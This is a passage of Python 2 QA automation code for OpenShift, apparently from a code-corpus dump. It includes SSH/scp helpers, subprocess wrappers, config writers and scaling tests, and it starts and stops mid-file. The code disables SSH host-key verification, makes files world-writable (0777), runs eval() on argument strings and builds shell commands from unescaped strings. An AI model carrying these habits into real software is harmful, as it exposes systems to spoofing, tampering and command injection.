of new %s\"%new_node_public_ip)\n ssh_options = \" -i %s -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no \"%(get_root_ssh_key_())\n cmd_get_status_output('cd /tmp; rm -rf /tmp/test; scp %(opt)s -r root@%(broker)s:/etc/openshift/devenv/qpid/test/ .; scp %(opt)s -r test/client_db/* root@%(hostname)s:/etc/qpid/pki/client_db/; scp %(opt)s -r test/server_db/* root@%(hostname)s:/etc/qpid/pki/server_db/'%({'hostname': new_node_public_ip, 'opt': ssh_options, 'broker': get_instance_ip()}))\n cmd_get_status_output('cd /tmp; rm -rf /tmp/clients; scp %(opt)s -r root@%(broker)s:/etc/mcollective/ssl/clients/ .; scp %(opt)s -r clients/* root@%(hostname)s:/etc/mcollective/ssl/clients/'%({'hostname': new_node_public_ip, 'opt': ssh_options, 'broker': get_instance_ip()}))\n\n ssh_cmd = [\"sed -i 's,^plugin.qpid.host.ha.*=.*,plugin.qpid.host.ha=%(internal_ip)s,' /etc/mcollective/server.cfg\"%broker,\n \"restorecon -R /etc/qpid/pki/; chmod +r /etc/qpid/pki/client_db/* /etc/qpid/pki/server_db/*\",\n \"sed -i 's,^BROKER_HOST.*=.*,BROKER_HOST=%(internal_ip)s,' /etc/openshift/node.conf\"%broker,\n \"service activemq stop; service mcollective restart\"]\n (ret, output) = rcmd_get_status_output(\" ; \".join(ssh_cmd), host=new_node_public_ip)\n if ret == 0:\n rcmd_get_status_output('mco ping', quiet=False)\n return 0\n else:\n log.error(output)\n return 1\n\n@timeit\ndef shutdown_node(instance_name):\n aws_obj = aws_console.AWS_Console()\n print \"Shuting down: %s\" %(instance_name)\n aws_obj.stop_node(instance_name)\n\n\ndef append_file(fpath, content, flag='w+', mode=0777):\n #import stat\n fp = open(fpath, flag)\n fp.write(content)\n fp.close()\n os.chmod(fpath, mode) #, stat.S_IRWXU | stat.S_IRWXG | stat.S_IRWXO)\n\n\ndef write_file(fpath, content, flag='w', mode=0777):\n #import stat\n fp = open(fpath, flag)\n fp.write(content)\n fp.close()\n os.chmod(fpath, mode) #stat.S_IRWXU | stat.S_IRWXG | stat.S_IRWXO)\n\n\ndef set_libra_server(instance_ip):\n \"\"\"\n Do setup :\n * environment variable $OPENSHIFT_libra_server\n * $HOME/.openshift/express.conf file with:\n libra_server=<instance_ip>\n\n This step should be executed only once at the begining,\n because all of the RHC command will use this value later.\n \"\"\"\n if instance_ip == 'int.openshift.redhat.com':\n run_mode = 'INT'\n elif instance_ip == 'stg.openshift.redhat.com':\n run_mode = 'STG'\n elif instance_ip == 'openshift.redhat.com':\n run_mode = 'PROD'\n elif instance_ip.find(\"example.com\") != -1 or instance_ip.find(\"test.com\") != -1 or instance_ip.find(\"broker\") != -1:\n run_mode = 'OnPremise'\n else:\n run_mode = 'DEV'\n\n os.putenv('OPENSHIFT_libra_server', instance_ip)\n (user, passwd) = get_default_rhlogin()\n fname = os.path.join(get_tmp_dir(),\"libra_server-%s\"%user)\n write_file(fname, instance_ip)\n log.info(\"Setting libra server to %s in %s\" %(instance_ip, express_conf_file))\n if not os.path.exists(express_conf_file):\n log.debug(\"Creating new config file in %s\"%express_conf_file)\n os.mkdir(os.path.dirname(express_conf_file))\n if run_mode == 'DEV':\n write_file(express_conf_file, \"libra_server=%s\\ninsecure=true\\n\" %(instance_ip))\n else:\n write_file(express_conf_file, \"libra_server=%s\\n\" % (instance_ip))\n else:\n cf = open(express_conf_file, 'r')\n output = cf.read()\n cf.close()\n output = re.sub(re.compile(r'^libra_server.*$', re.MULTILINE), \n \"libra_server='%s'\"%instance_ip, output)\n if not re.search('^libra_server=', output, re.MULTILINE):\n log.debug(\"Unable to find libra_server...appending new 
line...\")\n output = output.strip()\n output += \"\\nlibra_server='%s'\"%instance_ip\n if run_mode == 'DEV':\n if re.search('^insecure=', output, re.MULTILINE):\n output = re.sub(re.compile(r'^insecure.*$', re.MULTILINE), \n 'insecure=true', output)\n else:\n output += \"\\ninsecure=true\"\n else:\n match = re.search('^insecure=.*$', output, re.MULTILINE)\n if match:\n output = output[:match.start()] + output[match.end():]\n write_file(express_conf_file, output)\n\n\ndef get_instance_ip_by_tag(instance_tag):\n if instance_tag is None:\n raise Exception(\"ERROR: get_instance_ip_by_tag(): Missing/None argument.\")\n aws_obj = aws_console.AWS_Console()\n node = aws_obj.get_instance(instance_tag, True)\n return node.public_ip[0]\n\ndef get_instance_ip(instance_tag=None):\n \"\"\"\n If no instance_tag argument defined:\n Returns the IP address of libra server. Order of checking:\n - $OPENSHIFT_libra_server\n - ~/.openshift/express.conf\n - /etc/openshfit/express.conf\n\n Otherwise throws exception if none of above was found\n\n If instance_tag is defined, returns tries to get IP of running EC2 instance.\n \"\"\"\n if instance_tag is not None:\n return get_instance_ip_by_tag(instance_tag)\n (user, passwd) = get_default_rhlogin()\n tmp_file = os.path.join(get_tmp_dir(),\"libra_server-%s\" %(user))\n if os.getenv(\"OPENSHIFT_libra_server\"):\n return os.getenv(\"OPENSHIFT_libra_server\")\n elif os.path.exists(express_conf_file):\n c = open(express_conf_file).read()\n re_match_obj = re.search(\"^libra_server\\s*=[\\s']*([^\\s']+)\", c, re.M)\n if re_match_obj != None:\n ret_string = re_match_obj.group(1)\n #print \"Found libra_sever in %s: %s\" %(express_conf_file, ret_string)\n return ret_string\n else:\n raise Exception(\"Not found libra_server in %s !!!\" %(express_conf_file))\n elif os.path.exists(global_express_conf_file):\n c = open(global_express_conf_file).read()\n re_match_obj = re.search(r\"^libra_server\\s*=[\\s']*([^\\s']+)\", c, re.M)\n if re_match_obj != None:\n #print \"Found libra_sever in %s: %s\" %(global_express_conf_file, re_match_obj.group(1))\n return re_match_obj.group(1)\n else:\n raise Exception(\"Not found libra_server in %s !!!\" %(global_express_conf_file))\n elif os.path.exists(tmp_file):\n f = open(tmp_file, 'r')\n libra_ip = f.read()\n #print \"Found libra_sever in %s: %s\" %(tmp_file, libra_ip.strip())\n return libra_ip.strip()\n else:\n raise Exception(\"No libra sever specified !!!!\")\nget_broker_ip=get_instance_ip #alias\n\ndef extract_variants(arguments):\n variants = None\n\n if arguments is None:\n return variants\n\n try:\n if not re.match(r\"^{\", arguments) and (type(eval(arguments)) is dict) and ('VARIANTS' in eval(arguments).keys()):\n return eval(arguments)['VARIANTS']\n except:\n pass\n\n try:\n arguments = arguments.replace(\"'\",'\"') #necessary for JSON\n if not re.match(r\"^{\", arguments):\n json_args = json.loads(\" { \"+arguments+\" } \")\n else:\n json_args = json.loads(arguments)\n\n if (json_args.has_key('variants')):\n variants=json_args['variants']\n elif (json_args.has_key('VARIANTS')):\n variants=json_args['VARIANTS']\n elif (json_args.has_key('variant')):\n variants=json_args['variant']\n else:\n pass\n #print \"WARNING : UNABLE TO FIND VARIANTS field IN ARGUMENTS\"\n except Exception as e:\n log.warning(\"INVALID JSON FORMAT FOR ARGUMENTS.:%s\"%str(e))\n\n return variants\n\n\ndef get_domain_name_(user_email=None, user_passwd=None):\n \"\"\"\n Returns current openshift domain per given user.\n \"\"\"\n import openshift\n if user_email 
is None:\n        (user_email, user_passwd) = get_default_rhlogin()\n    li = openshift.Openshift(host=get_instance_ip(), \n                             user=user_email, \n                             passwd=user_passwd)\n    try:\n        status, response = li.domain_get()\n        if (status == 'OK' or status == 'Not Found'):\n            return response\n        else:\n            raise Exception(\"Unable to get domain name. status=%s, response=%s\"%(status, response))\n    except openshift.OpenShiftNullDomainException:\n        return None\n\n\ndef get_random_string(length = 10):\n    return ''.join(random.choice(string.ascii_lowercase + string.digits) for x in range(0, length))\n\n\ndef get_default_ssh_key_():\n    return os.getenv('HOME')+\"/.ssh/id_rsa\"\n\n\ndef rcmd_get_status_output(cmd, user='root', host=None, key_filename=None, quiet=True):\n    \"\"\"\n    Exec command under given user and returns tuple: (ret_code, stdout)\n    (host==None) => BROKER\n    \"\"\"\n    rhcsh_banners=[\n        '[\\\\S\\\\s.\\\\n\\\\r\\\\b\\\\t]*WARNING: This ssh terminal was started without a tty[\\\\S\\\\s.\\\\n\\\\r\\\\b\\\\t]+ssh -t',\n        '[\\\\S\\\\s.\\\\n\\\\r\\\\b\\\\t]*Welcome to OpenShift shell[\\\\S\\\\s.\\\\n\\\\r\\\\b\\\\t]+Type \"help\" for more info.']\n\n    if (user == 'root'):\n        if not host:\n            host = get_instance_ip()\n        if not key_filename:\n            key_filename = get_root_ssh_key_()\n    else:\n        if host is None:\n            raise Exception(\"Host is undefined. (rcmd_get_status_output())\")\n        if not key_filename:\n            key_filename = get_default_ssh_key_()\n\n    remote_cmd = cmd\n    if not quiet:\n        print \"DEBUG[SSH]: remote host: %s; user: %s; ssh key: %s\" %(host, user, key_filename)\n        print \"DEBUG[SSH]: remote cmd:%s\"%remote_cmd\n    ssh = paramiko.SSHClient()\n    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n    ssh.connect(host, username=user, key_filename=key_filename)\n    chan = ssh.get_transport().open_session()\n    chan.settimeout(COMMAND_TIMEOUT)\n    chan.exec_command(remote_cmd)\n    ret_code = chan.recv_exit_status() #wait for the end...\n    chan.set_combine_stderr(True)\n    stdout_data = []\n    #stderr_data = []\n    nbytes = 1024 #1kb buffer should be enough\n    time.sleep(1) #let's wait for a while\n    while chan.recv_ready():\n        stdout_data.append(chan.recv(nbytes))\n        sys.stderr.write('.')\n        sys.stderr.flush()\n        time.sleep(1) #let's wait for a while \n    ret_output = \"\".join(stdout_data)\n    '''\n    time.sleep(1) #let's wait for a while\n    while chan.recv_stderr_ready():\n        stderr_data.append(chan.recv(nbytes))\n        sys.stderr.write('_')\n        sys.stderr.flush()\n        time.sleep(1) #let's wait for a while \n    stderr_data = \"\".join(stderr_data)\n    '''\n    chan.close()\n    ssh.close()\n    print \"DEBUG[SSH]: exit code:%s\"%ret_code\n\n    #omit the rhcsh banners from the output\n    if (user != 'root'):\n        for ignore_pattern in rhcsh_banners:\n            ret_output = re.sub(ignore_pattern,'',ret_output)\n        ret_output = re.sub(re.compile('^Pseudo-terminal will not.*$', re.MULTILINE),'',ret_output)\n        ret_output = re.sub(re.compile('^Warning: Permanently added.*$', re.MULTILINE),'',ret_output)\n\n    if not quiet:\n        #print \"[SSH]: output:%s\"%ret_output\n        log.debug(\"[SSH]: output:%s\"%ret_output)\n    return (ret_code, ret_output)\n\n\ndef cmd_get_status(command, timeout=COMMAND_TIMEOUT, quiet=False):\n    #Method 1, can not kill all child processes\n    #print \"\"\"\\nRunning Command - %s\"\"\" %(command)\n    #status = subprocess.call(command, timeout=timeout, shell=True)\n    #print \"Command Return:\", status\n    #return status\n    \n    #Method 2, can kill all child processes, but no output can be seen when the command hangs there\n    #return command_getstatusoutput(command, False, timeout)[0]\n\n    #Best method\n    if not quiet:\n        print \"\"\"\\nRunning Command - %s\"\"\" %(command)\n    obj = 
subprocess.Popen(command, shell=True)\n if timeout >= 0:\n signal.signal(signal.SIGALRM, _alarm_handler)\n signal.alarm(timeout)\n try:\n status = obj.wait()\n if not quiet:\n print \"Command Return:\", status\n return status\n except Alarm:\n if os.uname()[0] == 'Linux':\n child_process_list = get_child_process_list(str(obj.pid))\n if not quiet:\n print \"All child process belong to %s: %s\" %(obj.pid, child_process_list)\n signal.alarm(0)\n obj.terminate()\n time.sleep(2)\n obj.kill()\n time.sleep(2)\n try:\n os.killpg(obj.pid, signal.SIGTERM)\n os.killpg(obj.pid, signal.SIGKILL)\n except:\n pass\n #obj.wait()\n if os.uname()[0] == 'Linux':\n commands.getstatusoutput(\"kill -9 %s\" %(\" \".join(child_process_list)))\n raise TimeoutError(\"Timeout %s seconds for command `%s` has expired.\"%(timeout, command))\n finally:\n signal.alarm(0)\n\n\ndef cmd_get_status_output(command, quiet = False, timeout=COMMAND_TIMEOUT):\n if not quiet:\n print \"\"\"\\nRunning Command - %s\"\"\" %(command)\n\n output=\"\"\n obj = subprocess.Popen(command, stdin=open(os.devnull,'rb'), stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=True)\n if timeout >= 0:\n signal.signal(signal.SIGALRM, _alarm_handler)\n signal.alarm(timeout)\n try:\n while obj.poll() == None:\n text = obj.stdout.readline()\n if not quiet:\n sys.stdout.write(\"%s\" %(text))\n sys.stdout.flush()\n output = output + text\n except Alarm:\n if os.uname()[0] == 'Linux':\n child_process_list = get_child_process_list(str(obj.pid))\n if not quiet:\n print \"All child process belong to %s: %s\" %(obj.pid, child_process_list)\n signal.alarm(0)\n obj.terminate()\n time.sleep(2)\n obj.kill()\n time.sleep(2)\n try:\n os.killpg(obj.pid, signal.SIGTERM)\n os.killpg(obj.pid, signal.SIGKILL)\n except:\n pass\n #obj.wait()\n if os.uname()[0] == 'Linux':\n commands.getstatusoutput(\"kill -9 %s\" %(\" \".join(child_process_list)))\n raise TimeoutError(\"Timeout %s seconds for command `%s` has expired.\"%(timeout,command))\n finally:\n signal.alarm(0)\n\n last_text = obj.stdout.read()\n if not quiet:\n sys.stdout.write(last_text)\n sys.stdout.flush()\n output = output + last_text\n #print \"-----\"\n #print output\n #print \"-----\"\n status = obj.poll()\n if not quiet:\n print \"Command Return:\", status\n return (status, output)\n\n\ndef remote_batch(cmd, user=\"root\", host=None, key_filename=None, quiet=True):\n \"\"\"\n Run remotely command and do scp of result.\n Returns status and output as if run locally.\n \"\"\"\n tmp_dump = get_random_string(10)+'.dump' #remote stdout\n tmp_code = \"%s.sh\"%get_random_string(10)\n if key_filename is None:\n if (user == 'root'):\n key_filename = get_root_ssh_key_()\n else:\n key_filename = get_default_ssh_key_()\n if host is None:\n host = get_instance_ip()\n ssh_options = \" -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -i %s \"%key_filename\n try:\n fw = open(tmp_code, 'wb')\n fw.write(\"#!/bin/sh\\n\\n%s\"%cmd)\n fw.close()\n #SCP file to the host\n cmd = \"scp %s %s %s@%s:\"%(ssh_options, tmp_code, user, host)\n (status, output) = cmd_get_status_output(cmd, quiet=quiet)\n if status != 0:\n raise Exception(\"Unable to copy batch script to the remote host. 
%s\"%output)\n #RUN remotely\n cmd = \"sh ./%s >%s 2>&1\"%(tmp_code, tmp_dump)\n (status, output) = rcmd_get_status_output(cmd, user, host)\n #SCP results back\n cmd = \"scp %s %s@%s:%s ./\"%(ssh_options, user, host, tmp_dump)\n (_ret, _output) = cmd_get_status_output(cmd, quiet=quiet)\n if _ret != 0:\n raise Exception(\"ERROR: Unable to get dump file from broker\")\n\n output = open(tmp_dump.split('/')[-1], \"rb\").read()\n except Exception as e:\n log.error(\"Unable to open/parse file: %s\"%str(e))\n raise e\n finally:\n #CLEAN locally and remotely\n (ret, _output) = rcmd_get_status_output(\"rm -f %s %s\"%(tmp_dump,tmp_code), quiet=quiet)\n if os.path.exists(tmp_dump):\n os.remove(tmp_dump)\n\n return (status, output)\n\n\ndef rcmd_get_status_output2(cmd, user='root', host=None, key_filename=None, quiet=True):\n \"\"\"\n Run command under given user and retusn tuple: (ret_code, stdout)\n Via SSH not by paramiko, which is veeryyyy slow\n \"\"\"\n ssh_options = \" -t -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no \"\n rhcsh_banners=[\n '[\\S\\s.\\n\\r\\b\\t]*WARNING: This ssh terminal was started without a tty[\\S\\s.\\n\\r\\b\\t]+ssh -t',\n '[\\S\\s.\\n\\r\\b\\t]*Welcome to OpenShift shell[\\S\\s.\\n\\r\\b\\t]+Type \"help\" for more info.']\n\n if (user == 'root'):\n if not host:\n host = get_instance_ip()\n if not key_filename:\n key_filename = get_root_ssh_key_()\n else:\n if host is None:\n raise Exception(\"Host is undefined. (rcmd_get_status_output())\")\n if not key_filename:\n key_filename = get_default_ssh_key_()\n\n remote_cmd = cmd\n if not quiet:\n print \"DEBUG[SSH]: remote host: %s; user: %s; ssh key: %s\" %(host, user, key_filename)\n print \"DEBUG[SSH]: remote cmd:%s\"%remote_cmd\n cmd = r\"stdbuf -o0 -i0 ssh %s -i %s %s@%s '%s'\"%(ssh_options, \n key_filename,\n user, \n host, \n remote_cmd)\n (ret_code, ret_output) = cmd_get_status_output(cmd, quiet=True)\n\n #omit the rhcsh banners from the output\n if (user != 'root'):\n for ignore_pattern in rhcsh_banners:\n ret_output = re.sub(ignore_pattern,'',ret_output)\n\n ret_output = re.sub('^Pseudo-terminal will not.*$','',ret_output, re.MULTILINE)\n ret_output = re.sub('^Warning: Permanently added.*$','',ret_output, re.MULTILINE)\n\n if not quiet:\n print \"DEBUG[SSH]: output:%s\"%ret_output\n return (ret_code, ret_output)\n\n\ndef get_root_ssh_key_():\n server_ip = get_instance_ip()\n etc_dir = get_etc_dir()\n if server_ip.find(\"example.com\") != -1 or server_ip.find(\"test.com\") != -1:\n ssh_key = etc_dir + '/onpremise/onpremise.pem'\n else:\n ssh_key = etc_dir + '/libra.pem'\n if not os.path.isfile(ssh_key):\n raise IOError(\"The %s file doesn't exist.\"%ssh_key)\n st = os.stat(ssh_key)\n #if not bool(st.st_mode & stat.S_IRUSR):\n os.chmod(ssh_key, 0400)\n\n return ssh_key\n\n\ndef _alarm_handler(signum, frame):\n raise Alarm\n\n\ndef get_lib_dir():\n return os.path.dirname(os.path.abspath(__file__))\n\n\ndef get_etc_dir():\n return os.path.abspath(get_lib_dir() + \"/../etc\")\n\n\ndef get_child_process_list(pid):\n # input: string or list\n # output: list\n if isinstance(pid, list):\n child_process_list = []\n for i in pid:\n (status, output) = cmd_get_status_output(\"pgrep -P %s\" %(i))\n if status == 0:\n tmp_list = output.split('\\n')\n #pid = pid + get_child_process_list(tmp_list)\n child_process_list = child_process_list + tmp_list\n child_process_list = child_process_list + get_child_process_list(tmp_list)\n else:\n pass\n #return pid\n return child_process_list\n elif isinstance(pid, str):\n return 
get_child_process_list([pid])\n    else:\n        print \"Neither a string nor a list\"\n        raise TypeError(\"pid must be a string or a list\")\n\n\ndef valid_cache(filename, expiration_hours=6):\n    \"\"\" Returns True if mtime of file is not older than \n        expiration_hours argument \"\"\"\n    if not os.path.exists(filename):\n        return False\n    st = os.stat(filename)\n    now = time.time()\n    valid_period = expiration_hours*60*60\n    #log.debug(\"%s > %s\"%(st.st_mtime, (now - valid_period)))\n    if st.st_mtime > (now - valid_period):\n        print \"[CACHE] %s FRESH\"%filename\n        return True\n    else:\n        print \"[CACHE] %s EXPIRED\"%filename\n        return False\n\n\ndef lock_file(filename):\n    # O_EXCL only takes effect together with O_CREAT\n    return os.open(filename, os.O_CREAT|os.O_EXCL|os.O_RDWR)\n\n\ndef unlock_file(lock):\n    # os.open() returns a raw file descriptor, so it must be closed with os.close()\n    os.close(lock)\n\n\ndef exclusive(func):\n    \"\"\" Exclusive decorator \"\"\"\n    def exclusived(*args, **kw):\n        lockfile = \"%s/.\"%get_tmp_dir()+func.__name__+\".lock\" #waiting for lock\n        sys.stderr.write(\"EXCL: Waiting for exclusive access[%s]\"%lockfile)\n        sys.stderr.flush()\n        oldumask = os.umask(0000)\n        lock = lock_file(lockfile) #waiting for lock\n        result = func(*args, **kw)\n        unlock_file(lock)\n        if os.path.exists(lockfile):\n            os.unlink(lockfile)\n        os.umask(oldumask)\n        sys.stderr.write(\"EXCL: released[%s]\"%lockfile)\n        sys.stderr.flush()\n        return result\n\n    return exclusived\n\n\ndef repeat_if_failure(func):\n    \"\"\" Repeater decorator for MercyException handling \"\"\"\n    def repeater(*args, **kw):\n        result = None\n        for attempt in range(2):\n            try:\n                result = func(*args, **kw)\n                break\n            except MercyException as e:\n                log.warning(\"An attempt of %s failed (reason: %s).\"%(func.__name__,e))\n                time.sleep(5)\n        return result\n    return repeater \n\n\ndef get_current_username():\n    import getpass\n    return getpass.getuser()\n\n\ndef get_homedir(user=None):\n    if user is None:\n        user = get_current_username()\n    return os.path.expanduser('~%s'%user)\n    \n\ndef get_tmp_dir():\n    if sys.platform == 'win32':\n        return os.getenv('TMP')\n    else:\n        return os.path.expanduser('~/tmp/')\n\n\ndef detect_os():\n    \"\"\" Returns [String] of the operating system : \n        ['FedoraXX', 'Debian', 'Ubuntu', 'RedHat' ] \"\"\"\n    if os.path.isfile(\"/etc/debian_version\"):\n        return \"Debian\"\n    elif os.path.isfile(\"/etc/fedora-release\"):\n        fr = open(\"/etc/fedora-release\", \"r\")\n        obj = re.search(r\"Fedora release (\\d+)\", fr.read())\n        fr.close()\n        return \"Fedora%s\"%obj.group(1)\n    elif os.path.isfile(\"/etc/redhat-release\"):\n        return \"RedHat\"\n    elif os.path.isfile(\"/etc/lsb-release\"):\n        return \"Ubuntu\"\n    else:\n        raise Exception(\"Unable to detect Linux distribution...\")\n\n\ndef dump_env():\n    for k in os.environ.keys():\n        print k,\"=\",os.environ[k]\n\ndef setup_rhc_client(version=None, branch=\"candidate\"):\n    import setup_client\n    return setup_client.do_setup(version, branch)\n\n\ndef inject_string_by_re(regex, injection, target, after=True):\n    \"\"\"Inserts a string on a new line if the previous line matches regex\"\"\"\n    #content = content[:pos] + new + content[pos:]\n    injected = []\n    rex = re.compile(r\"%s\"%regex)\n    hit = 0 \n    for line in target.split('\\n'):\n        injected.append(line)\n        if rex.search(line):\n            if after:\n                injected.append(injection)\n            else:\n                injected.insert(len(injected)-1, injection)\n            hit += 1\n    if hit == 0:\n        log.warning(\"No injection!\")\n    elif hit>1:\n        log.warning(\"Multiple injections (%d)!\"%hit)\n    return \"\\n\".join(injected)\n\n\ndef get_auth_headers(login, password):\n    \"\"\"Returns dict() with HTTP authentication headers\"\"\"\n    return {'Authorization' : \"Basic %s\"% base64.b64encode('%s:%s' % (login, 
password))}\n\n\ndef sshPKeyToFingerprint(pkey):\n import hashlib\n key = base64.b64decode(pkey)\n fp_plain = hashlib.md5(key).hexdigest()\n return ':'.join(a+b for a,b in zip(fp_plain[::2], fp_plain[1::2]))\n\n\ndef setup_ssh_config():\n ssh_config = \"\"\"\nHost *.stg.rhcloud.com\n IdentityFile ~/.ssh/id_rsa\n VerifyHostKeyDNS yes\n #LogLevel DEBUG\n PreferredAuthentications publickey\n StrictHostKeyChecking no\n UserKnownHostsFile ~/.ssh/openshift_known_hosts.stg\n\nHost *.int.rhcloud.com\n IdentityFile ~/.ssh/id_rsa\n VerifyHostKeyDNS yes\n PreferredAuthentications publickey\n StrictHostKeyChecking no\n UserKnownHostsFile ~/.ssh/openshift_known_hosts.int\n\nHost *.dev.rhcloud.com\n IdentityFile ~/.ssh/id_rsa\n VerifyHostKeyDNS yes\n #LogLevel DEBUG\n PreferredAuthentications publickey\n StrictHostKeyChecking no\n UserKnownHostsFile ~/.ssh/openshift_known_hosts.dev\n\n\"\"\"\n cfile = os.path.expanduser(\"~/.ssh/config\")\n\n if not os.path.exists(cfile):\n write_file(cfile, ssh_config, mode=0600)\n else:\n for line in open(cfile):\n if \"Host *.dev.rhcloud.com\" in line:\n return \n append_file(cfile, ssh_config, mode=0600)\n\n" }, { "alpha_fraction": 0.6182265877723694, "alphanum_fraction": 0.6223316788673401, "avg_line_length": 23.85714340209961, "blob_id": "0bfc6e35c9f79431cf102559315baf7e1c639388", "content_id": "9977156947dcbb03407122653d8e6bd332826018", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1218, "license_type": "no_license", "max_line_length": 93, "num_lines": 49, "path": "/automation/open/testmodules/Collections/Demo/Demo01.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n\"\"\"\n\"\"\"\nimport rhtest\nimport database\nimport time\nimport common\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\n\nclass OpenShiftTest(rhtest.Test):\n\n def initialize(self):\n self.msg = self.config.msg\n self.cart_type = self.config.tc_arguments['cart_type']\n self.variants = self.config.tc_arguments['variants']\n self.app_name = self.config.app_name + self.cart_type\n print \"############################\"\n #self.info(\"%s\" % self.config.tc_args.keys())\n\n def finalize(self):\n pass\n\n\nclass Demo01(OpenShiftTest):\n def test_method(self, args=None):\n #cart_type = common.app_types[self.cart_type]\n #self.info(\"Creating app for cartridge type '%s'\" % cart_type)\n # create an app\n #status, res = self.config.rest_api.app_create(self.app_name, cart_type, scale=False)\n #if status[0] == 'Created':\n return self.passed(\"Test passed.\")\n #else:\n #return self.failed(\"Test failed.\")\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(Demo01)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5204607844352722, "alphanum_fraction": 0.5242434740066528, "avg_line_length": 40.248226165771484, "blob_id": "1b8722139653b9fd32f509c85c5a25b9380b5e2a", "content_id": "4530573665faac8e719a57d92c54768d920eec2f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11632, "license_type": "no_license", "max_line_length": 114, "num_lines": 282, "path": "/automation/open/testmodules/RT/scaling/negative_scaling.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os\nimport OSConf\nimport common\nimport rhtest\nimport time\n# user defined packages\nimport fileinput, 
re\n\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.info(\"[US1463][BusinessIntegration] Scale-up / Scale down an non-scalable application \")\n try:\n self.test_variant = self.get_variant()\n except Exception as e:\n self.info(\"Warning: no test_variant defined, used `php` as default\")\n self.test_variant = \"php\"\n self.info(\"VARIANT: %s\"%self.test_variant)\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n self.app_type = common.app_types[self.test_variant]\n self.app_name = common.getRandomString(10)\n self.domain_name = common.get_domain_name()\n self.git_repo = './' + self.app_name\n common.env_setup()\n\n def finalize(self):\n pass\n \n\nclass NegativeScaling(OpenShiftTest):\n def configure_scale_up_test_application(self, git_repo):\n if self.test_variant == 'php':\n txt = \"<?php header('Content-Type: text/plain'); echo $_ENV['OPENSHIFT_GEAR_DNS']; ?>\"\n f_path = \"php/gear.php\"\n if self.test_variant == 'perl':\n txt = \"#!/usr/bin/perl\\n print 'Content-type: text/html\\r\\n\\r\\n';\\n print $ENV{'OPENSHIFT_GEAR_DNS'};\"\n f_path = \"perl/gear.pl\"\n cmd= \"touch %s\" % os.path.join(git_repo, f_path)\n os.system(cmd)\n if self.test_variant in (\"ruby\", \"ruby-1.9\"):\n f_path = \"config.ru\"\n try:\n for line in fileinput.input(git_repo + \"/config.ru\", inplace = 1):\n if re.search(\"map '/health' do\", line):\n print \"map '/gear.rb' do\"\n print \" gear_dns = proc do |env|\"\n print \" [ 200, { 'Content-Type' => 'text/plain'}, ENV['OPENSHIFT_GEAR_DNS'] ]\"\n print \" end\"\n print \" run gear_dns\"\n print \"end\"\n print\n print line\n except Exception as e:\n fileinput.close()\n print type(e)\n print e.args\n return 1\n finally:\n fileinput.close()\n if self.test_variant == \"python\":\n f_path = \"wsgi/application\"\n try:\n for line in fileinput.input(git_repo + \"/wsgi/application\", inplace = 1):\n if re.search(\"PATH_INFO.+/env\", line):\n print \" elif environ['PATH_INFO'] == '/gear.py':\"\n print \" response_body = os.environ['OPENSHIFT_GEAR_DNS']\"\n #print \"\\telif environ['PATH_INFO'] == '/gear.py':\"\n #print \"\\t\\tresponse_body = os.environ['OPENSHIFT_GEAR_DNS']\"\n print line,\n except Exception as e:\n print type(e)\n print e.args\n return 1\n finally:\n fileinput.close()\n\n if self.test_variant in ('jbossas', 'jbosseap', 'jbossews', 'jbossews2'):\n f_path = 'src/main/webapp/gear.jsp'\n gear_file = open(git_repo + \"/src/main/webapp/gear.jsp\", \"w\")\n gear_file.write(\"<%@ page contentType=\\\"text/plain\\\" language=\\\"java\\\" import=\\\"java.sql.*\\\" %>\\n\")\n gear_file.write(\"<%@ page import=\\\"javax.naming.*\\\" %>\\n\")\n gear_file.write(\"<%@ page import=\\\"java.util.*\\\" %>\\n\")\n gear_file.write(\"<%@ page trimDirectiveWhitespaces=\\\"true\\\" %>\\n\")\n gear_file.write(\"<%\\n\")\n gear_file.write(\"Map map = System.getenv();\\n\")\n gear_file.write(\"out.print(map.get(\\\"OPENSHIFT_GEAR_DNS\\\"));\\n\")\n gear_file.write(\"%>\\n\")\n gear_file.close() \n\n if self.test_variant == \"nodejs\":\n f_path = \"server.js\"\n try:\n for line in fileinput.input(git_repo + \"/server.js\", inplace = 1):\n if re.search(\"Handler for GET /health\", line):\n print \"app.get('/gear.js', function(req, res){\"\n print \" result = process.env.OPENSHIFT_GEAR_DNS;\"\n print \" res.send(result, {'Content-Type': 'text/plain'});\"\n print \"});\"\n print line,\n except Exception as e:\n fileinput.close()\n print type(e)\n print e.args\n return 1\n 
finally:\n fileinput.close()\n \n if self.test_variant in (\"php\", \"perl\"):\n f = open(os.path.join(git_repo, f_path), 'w')\n f.write(txt)\n f.close()\n\n configuration_steps = [\n \"cd %s\" % git_repo, \n \"git add %s\" % (f_path),\n \"git commit -a -m %s\" % (f_path),\n \"git push\"\n ]\n\n return common.command_get_status(\" && \".join(configuration_steps))\n\n def number_of_gears(self):\n app_url = OSConf.get_app_url(self.app_name)\n gears = list()\n\n # Checking the output of gear dns script more times\n for i in range(1, 20):\n if self.test_variant == 'php':\n gear = common.fetch_page(str(app_url) + \"/gear.php\")\n if self.test_variant == 'perl':\n gear = common.fetch_page(str(app_url) + \"/gear.pl\")\n if self.test_variant in ('ruby', 'ruby-1.9'):\n gear = common.fetch_page(str(app_url) + \"/gear.rb\")\n if self.test_variant == 'python':\n gear = common.fetch_page(str(app_url) + \"/gear.py\")\n if self.test_variant in ('jbosseap', 'jbossas', 'jbossews', 'jbossews2'):\n if i==1: time.sleep(60)\n gear = common.fetch_page(str(app_url) + \"/gear.jsp\")\n if self.test_variant == 'nodejs':\n gear = 